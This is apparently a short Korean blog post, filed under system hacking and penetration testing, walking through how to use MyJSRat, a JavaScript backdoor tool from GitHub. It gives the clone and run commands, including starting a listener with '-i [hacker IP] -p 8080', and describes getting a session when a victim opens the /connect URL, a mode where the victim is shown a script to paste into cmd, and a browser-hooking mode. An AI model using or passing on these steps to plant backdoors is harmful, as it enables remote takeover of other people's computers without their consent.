본문 바로가기
2. 시스템 해킹 및 모의 해킹

MyJSRat - 자바스크립트 백도어 생성

by Robert8478 2023. 12. 28.

https://github.com/Ridter/MyJSRat

 

GitHub - Ridter/MyJSRat: This is JSRat.ps1 in Python

This is JSRat.ps1 in Python. Contribute to Ridter/MyJSRat development by creating an account on GitHub.

github.com

[명령어 및 사용법]
1. # git clone https://github.com/Ridter/MyJSRat
으로 다운로드 받으시면 됩니다.

2 # ./MyJSRat.py -h 로 명령어 도움을 볼수 있습니다.

3 # ./MyJSRat.py -i [해커아이피] -p 8080 명령어를 이용해 서버를 만들어 줍니다.
// 서버 생성 전 MyJSRat.py를 열어서 맨 밑부분 response message에 원하는 메시지를 넣어 서버 접속 후 나오는 설명 구문을 추가로 넣어줄수있습니다.

4.클라이언트에서 위 명령어 입력후 나온 url 주소를 입력해 접속해줍니다.  (...:8080/connect 로 나오는 구문)

5.connect로 나온 주소로 접속 시 바로 세션이 잡히며, wtf의 경우 해킹이 되는 스크립트가 클라이언트 브라우저에 나와서 이 구문을 cmd에 입력하면 세션이잡히는 구조, hook의 경우 클라이언트 브라우저를 후킹하는 기능을 가지고 있네요.